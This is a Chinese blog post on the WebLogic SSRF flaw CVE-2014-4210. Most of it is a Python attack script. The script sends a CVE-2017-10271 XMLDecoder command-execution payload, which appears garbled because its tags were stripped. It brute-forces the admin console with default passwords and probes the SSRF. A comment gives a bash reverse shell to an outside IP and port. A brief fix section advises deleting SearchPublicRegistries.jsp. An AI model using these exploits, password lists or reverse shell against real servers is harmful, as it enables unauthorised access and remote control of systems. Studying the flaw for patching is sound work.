FLy_鹏程万里
FLy_鹏程万里

weblogic系列漏洞整理 ————5. weblogic SSRF 漏洞 UDDI Explorer对外开放 (CVE-2014-4210)

影响版本:10.0.2,10.3.6

SSRF漏洞,也称为XSPA(跨站端口攻击),问题存在于应用程序在加载用户提供的URL时,没能正确验证服务器的响应,然后就反馈回了客户端。攻击者可以利用该漏洞绕过访问限制(如防火墙),进而将受感染的服务器作为代理进行端口扫描,甚至访问系统中的数据。

利用过程

利用脚本

# !/usr/bin/env python           
# coding  : utf-8 
# Date    : 2018-04-03 19:08:00
# Author  : b4zinga
# Email   : [email protected]
# Function: weblogic vuln

import requests


class WebLogic:
    def __init__(self, url):
        if '://' not in url:
            url = 'http://' + url
        self.url = url.strip('/')

    def xmlDecoder(self):
        """Version:10.3.6.0.0/12.1.3.0.0/12.2.1.1.0
        CVE-2017-10271
        """
        headers = {
            "Content-Type":"text/xml;charset=UTF-8",
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }

        # bash -i >& /dev/tcp/192.168.1.133/4444 0>&1
        xml = """
         
            
                
                    
                        
                            
                                
                                    /bin/bash
                                
                                
                                    -c
                                
                                
                                id > /tmp/b4
                                
                            
                        
                    
                
            
        
        """
        req = requests.post(self.url+":7001/wls-wsat/CoordinatorPortType", headers=headers, data=xml)
        if req.status_code == 500 :
            print('[+] WebLogic xml decoder ')
            # print(req.text)

    def weakPasswd(self):
        """weak password"""

        pwddict = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem']
        for user in pwddict:
            for pwd in pwddict:
                data = {
                    'j_username':user,
                    'j_password':pwd,
                    'j_character_encoding':'UTF-8'
                }
                req = requests.post(self.url+':7001/console/j_security_check', data=data, allow_redirects=False, verify=False)

                if req.status_code == 302 and 'console' in req.text and 'LoginForm.jsp' not in req.text:
                    print('[+] WebLogic username: '+user+'  password: '+pwd)

    def ssrf(self):
        """Version: 10.0.2/10.3.6
        CVE-2014-4210"""
        # payload = ":7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001"
        payload = ":7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"

        req = requests.get(self.url+payload, timeout=10, verify=False)
        if "weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and "IO Exception on sendMessage" not in req.text:
            print("[+] WebLogic ssrf")



if __name__ == '__main__':
    url = '192.168.136.130'
    wls = WebLogic(url)

    wls.xmlDecoder()
    wls.weakPasswd()
    wls.ssrf()

修复建议

​ Weblogic服务端请求伪造漏洞出现在UDDI组件(所以安装Weblogic时如果没有选择UDDI组件那么就不会有该漏洞),更准确地说是UDDI包实现包uddiexplorer.war下的SearchPublicRegistries.jsp。

​ 所以修复这个漏洞最直接的方式就是删除这个jsp页面。

jar -xvf uddiexplorer.war
rm SearchPublicRegistries.jsp
jar -cvfM uddiexplorer.war uddiexplorer/

你可能感兴趣的:(【服务器漏洞】,———WebLogic)

  • 离线部署视觉模型Qwen2.5-VL方案【企业应用级】 LensonYuan 机器视觉自然语言处理qwenvl视觉模型大模型部署qwen2.5qwen2.5环境qwen2.5-vl镜像包
    离线多卡部署视觉模型Qwen2.5-VL企业级服务方案一、背景公司网络是有严格限制,所有涉及境外服务器的网站都无法访问,包括docker等镜像源。本教程,是在提前下载或构建好资源,通过上传到服务器后,做离线部署。二、参考环境大模型服务发布工具:VLLM=0.7.2。大模型版本:qwen2.5-vl-7b,其他版本也可。python版本:python==3.12。环境可选:docker或直接pyth
  • Github库镜像到本地私有Gitlab服务器 Thinbug 版本控制githubgitlab
    上一节我们看了如何架设自己的Gitlab服务器,今天我们看怎么把Github库转移到自己的Gitlab上。首先登录github,进入自己的库复制地址。克隆镜像库在本地新建一个文件夹在文件夹执行CMD指令[email protected]:thinbug/A.git–mirror参数就是拉取镜像库。拉取结束,进入目录:cdA.git我们可以看到这个库是这样的。添加远程库通过
  • Docker应用推荐个人服务器实用有趣的项目推荐 牧子与羊 docker服务器容器
    Wallabag:是一个开源的、自托管的文章阅读和保存工具。它允许你保存网页文章并进行离线阅读,去除广告和不必要的内容,以提供更好的阅读体验。Wallabag支持多种导入和导出格式,并提供了一些实用的功能,如标签、阅读列表和文本高亮。phpMyAdmin:是一个基于Web的MySQL数据库管理工具。它提供了一个易于使用的界面,用于管理数据库、执行SQL查询、导入导出数据、创建表格、用户管理等各种数
  • Servlet概述 出门撞大运 servlet
    在JavaWeb开发中,Servlet是核心组件之一,负责处理客户端请求并生成响应。本文将从Servlet的基本概念出发,逐步深入其生命周期、实现方式、路径映射等关键知识点,帮助你全面掌握Servlet技术。一、Servlet概述与JavaWeb三大组件Servlet(ServerLet)是运行在Web服务器中的小型Java程序,主要作用是处理用户请求。当客户端发出请求后,由Web服务器(如Tom
  • 网络编程---7.11 疾跑哥布林升级版 网络php开发语言
    思维导图服务器代码:#include#include#include#include#include#include#include//客户端连接的文件描述符(全局方便线程访问)intclient_fd;//线程函数:接收客户端消息void*recv_msg(void*arg){charbuf[1024];while(1){//清空缓冲区memset(buf,0,sizeof(buf));//接收
  • 网络编程7.12
    实现2个客户端之间互相聊天服务器要求:使用select模型实现接受多个客户端连接,以及转发消息客户端要求:使用poll模型解决技能够read读取服务器发来的消息,又能够scanf读取键盘输入的信息客户端服务器不允许开启额外线程和进程服务器代码:#include#include#include#include#include#include#include//最大客户端数量#defineMAX_CL
  • PHP实战就业指南:从入门到高薪的核心技能图谱
    PHP实战就业指南:从入门到高薪的核心技能图谱残酷现实与光明前景:尽管新兴语言不断涌现,PHP仍占据全球78.9%的服务器市场份额(W3Techs2024),国内招聘平台日均发布2.3万+PHP岗位,薪资范围6K-45K。关键在于掌握市场真正需要的技能组合。一、就业市场三大方向与薪资对标方向代表岗位薪资范围(1-3年经验)核心技术栈要求企业级开发PHP高级开发工程师15K-25KLaravel/S
  • SCP命令传输文件 惟余惟余 运维
    SCP进行文件传输一、基本语法:二、具体用法1.从本地将文件传输到服务器2.从本地将文件夹传输到服务器3.将服务器上的文件传输到本地4.将服务器上的文件夹传输到本地一、基本语法:Linuxscp命令用于Linux之间复制文件和目录。scp概述:scp是securecopy的缩写,scp是linux系统下基于ssh登陆进行安全的远程文件拷贝命令。scp与rcp的区别:scp是加密的,rcp是不加密的
  • 用 Next.js 实现静态与动态渲染的完美平衡 荣华富贵8 程序员的知识储备2程序员的知识储备3前端
    一、引言随着Web应用的复杂度不断提升,渲染性能与用户体验成为开发者与产品运营方关注的核心问题。静态站点生成(StaticSiteGeneration,SSG)与服务器端渲染(Server-SideRendering,SSR)各有优劣:前者在首屏加载速度和CDN分发方面表现卓越,而后者在动态内容更新和个性化体验上占据优势。Next.js作为React生态中领先的全栈框架,通过getStaticPr
  • 面对微软AD的安全隐患,宁盾身份域管如何设计安全性 宁盾Nington 安全
    微软AD域安全漏洞带来的痛点部分企业客户选择宁盾身份域管的重要动因之一,正是微软AD域及WindowsServer长期存在的安全隐患。在微软AD域信创整改项目中,“宁盾如何保障加域计算机终端安全”是被高频问及的关键问题。微软AD域作为企业组织身份验证与权限管理的核心系统,一旦遭受攻击,可能引发全域性安全风险,其典型渗透路径可归纳为以下四类:特权提升攻击:攻击者利用漏洞从普通用户提升到域管理员等特权
  • Vert.x逆袭指南:像外卖小哥一样高效的异步编程哲学 —— 每秒处理百万消息的轻量级响应式引擎 zhysunny Java类库java后端
    目录一、核心装备:Vert.x工具箱全景1.1灵魂组件:EventLoop(永不堵车的快递站)二、基础订单处理:Future与Promise模式2.1基础异步操作流程2.2并行订单冲刺三、全栈式快餐车:Vert.xWeb实战3.1打造高并发HTTP服务器3.2异步数据库连接池四、连锁加盟模式:Vert.x集群4.1构建分布式披萨联盟五、响应式编程的味觉革命:四大核心优势5.1性能对比实验(单节点)
  • 国内外服务器的不同之处 wanhengidc 服务器运维
    国内服务器主要是面向国内用户提供服务,由于进行数据传输的物理距离比较短,所以网络延迟度相对较低,当用户在使用相同运营商网络的情况下,可以通过优化的网络线路和节点布局,以此来实现快速的数据交互,满足大量用户同时访问数据的需求。若国内用户选择使用国外服务器,数据需要跨越大洋或较长的地理距离进行传输,这不可避免地会增加网络延迟,这对于一些对实时性要求极高的应用,如在线游戏、实时视频会议等场景,可能会造成
  • Java安全:SpringBoot项目中Fastjson组件的使用与安全实践 rockmelodies java安全java安全springboot
    前言Fastjson是阿里巴巴开源的一个高性能JavaJSON库,广泛用于Java对象的序列化和反序列化操作。在SpringBoot项目中,Fastjson常被用作JSON处理工具。然而,Fastjson因其高性能而广受欢迎的同时,也因多次爆出的安全漏洞而备受关注。本文将介绍如何在SpringBoot项目中正确使用Fastjson,并讨论相关的安全实践。一、SpringBoot项目中集成Fastj
  • bug:定时任务因数据库时间滞后导致数据清理失效问题 刘火锅 javaspringcloudspring后端mybatis
    问题背景:在数据清理定时任务中,发现理应被删除的数据未被正确清理。经排查发现:定时任务配置在每日00:00:00执行删除数据SQL语句逻辑正常应用服务器时间准确数据库服务器时间比应用服务器慢15秒数据清理SQL使用CURDATE()获取当前日期问题原因分析:当应用服务器在00:00:00触发任务时:应用服务器时间:2025-07-1800:00:00数据库服务器时间:2025-07-1723:59
  • Node+OBS直播服务器搭建总结 马克关 Node教程直播nodeobs
    导语:最近研究了一下网页直播流的原理以及实现,现在就目前的实现方法做一个总结。目录直播流媒体协议拉流与推流Node服务搭建前端播放页面OBS推流配置直播流媒体协议先来了解一下基本的直播流媒体协议。http-flv,rtpm协议/特点开发者原理优点缺点http-flvAbode通过服务器把flv下载到本地缓存,然后通过NetConnection本地连接播放节省服务器消耗保密性差rtmpAbode通过
  • session与cookie的区别 小高Baby@ 服务器计算机网络
    Cookie数据保存在客户端(你的设备),而Session数据保存在服务器端。Cookie相对来说不够安全,因为别人可以访问你的设备来获取Cookie信息;而Session数据保存在服务器上,只有服务器能访问。每个域名下的cookie数量和大小都有限制(通常每个cookie不超过4KB,每个域名约20-50个cookie),cookie不适合存储大量数据;session由服务器端存储,理论上没有严
  • 详解Linux(Ubuntu/RedHat/CentOS)及国产服务器统一加域管理方案
    本期内容将通过一个实际案例讲清楚数据中心服务器身份认证场景的痛点及宁盾身份域管在其中的作用和价值。很多行业,像金融、运营商,还有那些关系国计民生的服务单位,均会受到监管制度统一要求,对数据中心的服务器执行定期修改口令、统一身份认证和MFA多因素认证。另外,等保、密评同样要求对服务器运维进行安全管控。但一般数据中心服务器规模较大,存在各种管理乱象,如:1.各种Linux,如Ubuntu、Redhat
  • 服务器清理空间--主要是conda环境清理和删除
    1.查看空间情况(base)zhouy24@RL-DSlab:~/zhouy24Files$df-hFilesystemSizeUsedAvailUse%Mountedonudev252G0252G0%/devtmpfs51G4.9M51G1%/run/dev/nvme0n1p31.9T1.7T42G98%/tmpfs252G800M252G1%/dev/shmtmpfs5.0M4.0K5.0M1
  • html js 查询数据库,如何使用javascript查询数据库?
    小编典典Javascript本身不能用于处理数据库。这是使用php(或您选择的服务器端语言)完成的。Ajax用于使用javascript向您的php脚本发送请求,而javascript则会与数据库进行通信。而且不需要页面刷新。因此,您尝试使用ajax可以轻松实现。既然您提到了jquery,就可以在jquery中签出$.ajax或$.post方法,这使过程更加简单。您需要使用ajax处理表单。Aja
  • 显示连接ftp文件列表的html,FileZilla连接成功但没显示所有目录 李霁琛
    最近弄了个虚拟主机,想写写自己的博客玩玩。然后买主机,买域名,安装了wordpress写了几篇博客,就放在一边了。用的都是wordpress的模板,没有涉及到上传本地php文件到远程服务器。在虚拟主机的Cpanel里,直接上传php或较大的文件夹时通常会失败。用网页上传也很慢。于是弄了Filezilla,免费好用的FTP上传工具。然后按照虚拟主机的Cpanel里的教程,下载了配置文件,直接在fil
  • 提高互联网Web安全性:避免越权漏洞的技术方案 码农老起 安全加密算法web安全安全
    目录一、越权漏洞概述二、常见的越权漏洞类型三、越权漏洞的影响四、越权漏洞的技术解决方案一、越权漏洞概述越权(AuthorizationBypass)类漏洞是指在系统中,攻击者通过绕过身份验证或访问控制,获取本不应访问的资源或执行本不应执行的操作。简单来说,越权漏洞发生时,用户能够访问或操作超出其授权范围的数据或功能。在Web应用中,越权漏洞通常出现在访问控制机制不严密、权限检查不充分或不正确的情况
  • 【Linux学习】Ubuntu对用户进行管理 Small___ming Linuxlinuxubuntu用户管理
    目录写在前面【Linux学习】Ubuntu对用户进行管理一、为什么需要用户管理?二、用户管理基础操作(一)用户管理1.用户管理命令表格2.关键操作场景说明场景一:创建用户并配置权限场景二:修改用户属性场景三:设置密码策略场景四:锁定并删除用户3.配置文件说明4.注意事项5.其他问题(1)新创建的用户目录在哪里?(2)多硬盘服务器如何指定用户目录?方法一:创建用户时直接指定路径方法二:挂载硬盘到`/
  • 运维打铁: Ruby 脚本在运维自动化中的应用探索 懂搬砖 运维打铁原力计划运维ruby自动化
    文章目录一、思维导图二、基础介绍1.Ruby语言特点2.运维自动化概念三、应用场景1.服务器配置管理2.定时任务执行3.日志分析处理四、代码示例1.服务器配置脚本2.定时任务脚本3.日志分析脚本五、优势与挑战1.优势2.挑战六、总结与展望一、思维导图Ruby脚本在运维自动化中的应用基础介绍应用场景代码示例优势与挑战总结与展望Ruby语言特点运维自动化概念服务器配置管理定时任务执行日志分析处理服务器
  • JavaScript 性能优化实战指南
    JavaScript性能优化实战指南一、引言JavaScript是一种广泛使用的编程语言,尤其在前端开发中占据重要地位。随着Web应用的复杂度不断增加,性能优化成为开发过程中不可或缺的一部分。性能优化不仅可以提升用户体验,还能减少服务器负载,提高应用的响应速度。本文将从多个方面详细探讨JavaScript性能优化的实战技巧,包括代码优化、内存管理、异步编程、资源加载优化等,旨在为开发者提供一份全面
  • 阿里云服务器4核8G配置可选实例规格详解及优惠价格表(2023年新版) 阿里云最新优惠和活动汇总
    阿里云服务器4核8G配置多少钱?可选实例规格有哪些?根据阿里云公布的2023年新版收费标准及活动价格来看,阿里云服务器4核8G最低活动价格是75.06元3个月,年付最低1200.96元1年。阿里云服务器4核8G配置的可选的规格有18个,不同实例的价格有所不同,下面是4核8G配置可选实例规格详解及优惠价格表。阿里云服务器4核8G配置可选实例规格有哪些?在2023年,阿里云服务器4核8G配置可选的实例
  • 如何通过linux黑窗口实现对远程服务器的操作
    ①选择合适的云平台进行设备的租用并复制好远程设备的IP地址②使用管理员权限打开黑窗口③输入命令连接远程的设备:ssh用户名@服务器IP地址,此时得到的是一个什么都没有的设备④由于该设备什么都没有,故先:sudoaptupdate,然后安装gcc编译器:sudoaptinstallbulid-essential,再然后安装python:sudoaptinstallpython-3.8,再然后安装mi
  • 2025年各细分产业链企业数据(汽车、数字经济、食品、制造业) 经管数据库 汽车智能手机数据分析
    本数据包含2025年及之前的所有上中下游企业信息,67个细分产业。汽车专区、数字经济专区、数字创意专区、未来产业专区、高端装备专区、新能源专区、食品农业专区、传统制造业专区等71个文件。汽车专区:充电桩制造动力电池汽车材料制造汽车制造汽车制造设备汽车座椅制造驱动电机制造燃料电池汽车制造燃料电池系统制造新能源汽车制造智能驾驶智能视觉数字经济专区:5g边缘计算大数据类服务器光通信集成电路区块链人工智能
  • 2018-08-07 清秋致远
    无题作者/清秋致远刚刚清静下来却被火辣辣的太阳挤到树荫下进行曲中的旋律表达着什么手捧鲜花的鸽子把春天举过头顶它要向大地演绎一场惊天动地的爱情风借来方向被一群客人阻拦所有的日子涌向街道关上门不是为了拒绝声响而是让疲惫好好释放时间囚禁的劳累一条鱼掉进泡沫里那是它呼出的空气左右撞击脱离不了水的困扰一首诗写完了却拟不出标题漏洞百出的书籍也能抒发写作者的情绪说着说着风抬来了一场雨我把故事搬进诗里讲述着当年的
  • 【实操】信息安全工程师系列-第22关 网站安全需求分析与安全保护工程 披荆斩棘的GG 安全
    【实操】信息安全工程师系列-第22关网站安全需求分析与安全保护工程********永远不要信任用户输入。—安全编程格言一、网站安全基础概念与威胁分(一)核心定义**网站安全目标:**保障机密性(数据不泄露)、完整性(数据不被篡改)、可用性(服务不中断)和可控性(管理可控制)。**技术架构:**基于B/S架构,涉及网络通信、操作系统、数据库、Web服务器(如Apache、IIS)、Web应用及相关协
  • 网络编程中的 Protobuf 和 JsonCpp 全面解析 筏.k c++asio网络编程网络开发语言c++服务器
    文章目录前言一、为什么需要序列化?序列化的好处:常见序列化格式包括:二、JsonCpp与Protobuf对比三、JsonCpp简介与示例(客户端通信)JsonCpp使用示例(客户端发送请求):JsonCpp使用示例(服务器解析请求):四、Protobuf简介与示例(服务器通信)定义消息格式(user.proto)编译生成代码:服务器端序列化&发送数据接收端解析数据五、使用建议总结前言在网络编程中,
  • 基本数据类型和引用类型的初始值 3213213333332132 java基础
    package com.array; /** * @Description 测试初始值 * @author FuJianyong * 2015-1-22上午10:31:53 */ public class ArrayTest { ArrayTest at; String str; byte bt; short s; int i; long
  • 摘抄笔记--《编写高质量代码:改善Java程序的151个建议》 白糖_ 高质量代码
            记得3年前刚到公司,同桌同事见我无事可做就借我看《编写高质量代码:改善Java程序的151个建议》这本书,当时看了几页没上心就没研究了。到上个月在公司偶然看到,于是乎又找来看看,我的天,真是非常多的干货,对于我这种静不下心的人真是帮助莫大呀。           看完整本书,也记了不少笔记
  • 【备忘】Django 常用命令及最佳实践 dongwei_6688 django
    注意:本文基于 Django 1.8.2 版本   生成数据库迁移脚本(python 脚本) python manage.py makemigrations polls  说明:polls 是你的应用名字,运行该命令时需要根据你的应用名字进行调整   查看该次迁移需要执行的 SQL 语句(只查看语句,并不应用到数据库上): python manage.p
  • 阶乘算法之一N! 末尾有多少个零 周凡杨 java算法阶乘面试效率
                                     &n
  • spring注入servlet g21121 Spring注入
    传统的配置方法是无法将bean或属性直接注入到servlet中的,配置代理servlet亦比较麻烦,这里其实有比较简单的方法,其实就是在servlet的init()方法中加入要注入的内容: ServletContext application = getServletContext(); WebApplicationContext wac = WebApplicationContextUtil
  • Jenkins 命令行操作说明文档 510888780 centos
    假设Jenkins的URL为http://22.11.140.38:9080/jenkins/ 基本的格式为 java 基本的格式为 java -jar jenkins-cli.jar [-s JENKINS_URL] command [options][args] 下面具体介绍各个命令的作用及基本使用方法 1. &nb
  • UnicodeBlock检测中文用法 布衣凌宇 UnicodeBlock
    /**  * 判断输入的是汉字  */ public static boolean isChinese(char c) {        Character.UnicodeBlock ub = Character.UnicodeBlock.of(c);    
  • java下实现调用oracle的存储过程和函数 aijuans javaorale
    1.创建表:STOCK_PRICES     2.插入测试数据:     3.建立一个返回游标:  PKG_PUB_UTILS   4.创建和存储过程:P_GET_PRICE     5.创建函数:   6.JAVA调用存储过程返回结果集 JDBCoracle10G_INVO
  • Velocity Toolbox antlove 模板toolboxvelocity
    velocity.VelocityUtil package velocity; import org.apache.velocity.Template; import org.apache.velocity.app.Velocity; import org.apache.velocity.app.VelocityEngine; import org.apache.velocity.c
  • JAVA正则表达式匹配基础 百合不是茶 java正则表达式的匹配
      正则表达式;提高程序的性能,简化代码,提高代码的可读性,简化对字符串的操作   正则表达式的用途; 字符串的匹配 字符串的分割 字符串的查找 字符串的替换       正则表达式的验证语法     [a] //[]表示这个字符只出现一次 ,[a] 表示a只出现一
  • 是否使用EL表达式的配置 bijian1013 jspweb.xmlELEasyTemplate
            今天在开发过程中发现一个细节问题,由于前端采用EasyTemplate模板方法实现数据展示,但老是不能正常显示出来。后来发现竟是EL将我的EasyTemplate的${...}解释执行了,导致我的模板不能正常展示后台数据。         网
  • 精通Oracle10编程SQL(1-3)PLSQL基础 bijian1013 oracle数据库plsql
    --只包含执行部分的PL/SQL块 --set serveroutput off begin dbms_output.put_line('Hello,everyone!'); end; select * from emp; --包含定义部分和执行部分的PL/SQL块 declare v_ename varchar2(5); begin select
  • 【Nginx三】Nginx作为反向代理服务器 bit1129 nginx
    Nginx一个常用的功能是作为代理服务器。代理服务器通常完成如下的功能:   接受客户端请求 将请求转发给被代理的服务器 从被代理的服务器获得响应结果 把响应结果返回给客户端 实例 本文把Nginx配置成一个简单的代理服务器 对于静态的html和图片,直接从Nginx获取 对于动态的页面,例如JSP或者Servlet,Nginx则将请求转发给Res
  • Plugin execution not covered by lifecycle configuration: org.apache.maven.plugin blackproof maven报错
    转:http://stackoverflow.com/questions/6352208/how-to-solve-plugin-execution-not-covered-by-lifecycle-configuration-for-sprin   maven报错: Plugin execution not covered by lifecycle configuration:
  • 发布docker程序到marathon ronin47 docker 发布应用
    1 发布docker程序到marathon 1.1 搭建私有docker registry 1.1.1 安装docker regisry docker pull docker-registry docker run -t -p 5000:5000 docker-registry 下载docker镜像并发布到私有registry docker pull consol/tomcat-8.0
  • java-57-用两个栈实现队列&&用两个队列实现一个栈 bylijinnan java
    import java.util.ArrayList; import java.util.List; import java.util.Stack; /* * Q 57 用两个栈实现队列 */ public class QueueImplementByTwoStacks { private Stack<Integer> stack1; pr
  • Nginx配置性能优化 cfyme nginx
    转载地址:http://blog.csdn.net/xifeijian/article/details/20956605   大多数的Nginx安装指南告诉你如下基础知识——通过apt-get安装,修改这里或那里的几行配置,好了,你已经有了一个Web服务器了。而且,在大多数情况下,一个常规安装的nginx对你的网站来说已经能很好地工作了。然而,如果你真的想挤压出Nginx的性能,你必
  • [JAVA图形图像]JAVA体系需要稳扎稳打,逐步推进图像图形处理技术 comsci java
         对图形图像进行精确处理,需要大量的数学工具,即使是从底层硬件模拟层开始设计,也离不开大量的数学工具包,因为我认为,JAVA语言体系在图形图像处理模块上面的研发工作,需要从开发一些基础的,类似实时数学函数构造器和解析器的软件包入手,而不是急于利用第三方代码工具来实现一个不严格的图形图像处理软件......   &nb
  • MonkeyRunner的使用 dai_lm androidMonkeyRunner
    要使用MonkeyRunner,就要学习使用Python,哎 先抄一段官方doc里的代码 作用是启动一个程序(应该是启动程序默认的Activity),然后按MENU键,并截屏 # Imports the monkeyrunner modules used by this program from com.android.monkeyrunner import MonkeyRun
  • Hadoop-- 海量文件的分布式计算处理方案 datamachine mapreducehadoop分布式计算
    csdn的一个关于hadoop的分布式处理方案,存档。 原帖:http://blog.csdn.net/calvinxiu/article/details/1506112。     Hadoop 是Google MapReduce的一个Java实现。MapReduce是一种简化的分布式编程模式,让程序自动分布到一个由普通机器组成的超大集群上并发执行。就如同ja
  • 以資料庫驗證登入 dcj3sjt126com yii
    以資料庫驗證登入 由於 Yii 內定的原始框架程式, 採用綁定在UserIdentity.php 的 demo 與 admin 帳號密碼:    public function authenticate()    {        $users=array( &nbs
  • github做webhooks:[2]php版本自动触发更新 dcj3sjt126com githubgitwebhooks
    上次已经说过了如何在github控制面板做查看url的返回信息了。这次就到了直接贴钩子代码的时候了。 工具/原料 git github 方法/步骤   在github的setting里面的webhooks里把我们的url地址填进去。   钩子更新的代码如下: error_reportin
  • Eos开发常用表达式 蕃薯耀 Eos开发Eos入门Eos开发常用表达式
    Eos开发常用表达式 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2014年8月18日 15:03:35 星期一     &
  • SpringSecurity3.X--SpEL 表达式 hanqunfeng SpringSecurity
    使用 Spring 表达式语言配置访问控制,要实现这一功能的直接方式是在<http>配置元素上添加 use-expressions 属性:   <http auto-config="true" use-expressions="true"> 这样就会在投票器中自动增加一个投票器:org.springframework
  • Redis vs Memcache IXHONG redis
    1. Redis中,并不是所有的数据都一直存储在内存中的,这是和Memcached相比一个最大的区别。 2. Redis不仅仅支持简单的k/v类型的数据,同时还提供list,set,hash等数据结构的存储。 3. Redis支持数据的备份,即master-slave模式的数据备份。 4. Redis支持数据的持久化,可以将内存中的数据保持在磁盘中,重启的时候可以再次加载进行使用。 Red
  • Python - 装饰器使用过程中的误区解读 kvhur JavaScriptjqueryhtml5css
    大家都知道装饰器是一个很著名的设计模式,经常被用于AOP(面向切面编程)的场景,较为经典的有插入日志,性能测试,事务处理,Web权限校验, Cache等。 原文链接:http://www.gbtags.com/gb/share/5563.htm Python语言本身提供了装饰器语法(@),典型的装饰器实现如下:   @function_wrapper de
  • 架构师之mybatis-----update 带case when 针对多种情况更新 nannan408 case when
    1.前言.    如题. 2. 代码.   <update id="batchUpdate" parameterType="java.util.List"> <foreach collection="list" item="list" index=&
  • Algorithm算法视频教程 栏目记者 Algorithm算法
    课程:Algorithm算法视频教程 百度网盘下载地址: http://pan.baidu.com/s/1qWFjjQW 密码: 2mji 程序写的好不好,还得看算法屌不屌!Algorithm算法博大精深。 一、课程内容: 课时1、算法的基本概念 + Sequential search 课时2、Binary search 课时3、Hash table 课时4、Algor
  • C语言算法之冒泡排序 qiufeihu c算法
    任意输入10个数字由小到大进行排序。 代码: #include <stdio.h> int main() { int i,j,t,a[11]; /*定义变量及数组为基本类型*/ for(i = 1;i < 11;i++){ scanf("%d",&a[i]); /*从键盘中输入10个数*/ } for
  • JSP异常处理 wyzuomumu Webjsp
    1.在可能发生异常的网页中通过指令将HTTP请求转发给另一个专门处理异常的网页中: <%@ page errorPage="errors.jsp"%>   2.在处理异常的网页中做如下声明: errors.jsp: <%@ page isErrorPage="true"%>,这样设置完后就可以在网页中直接访问exc
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他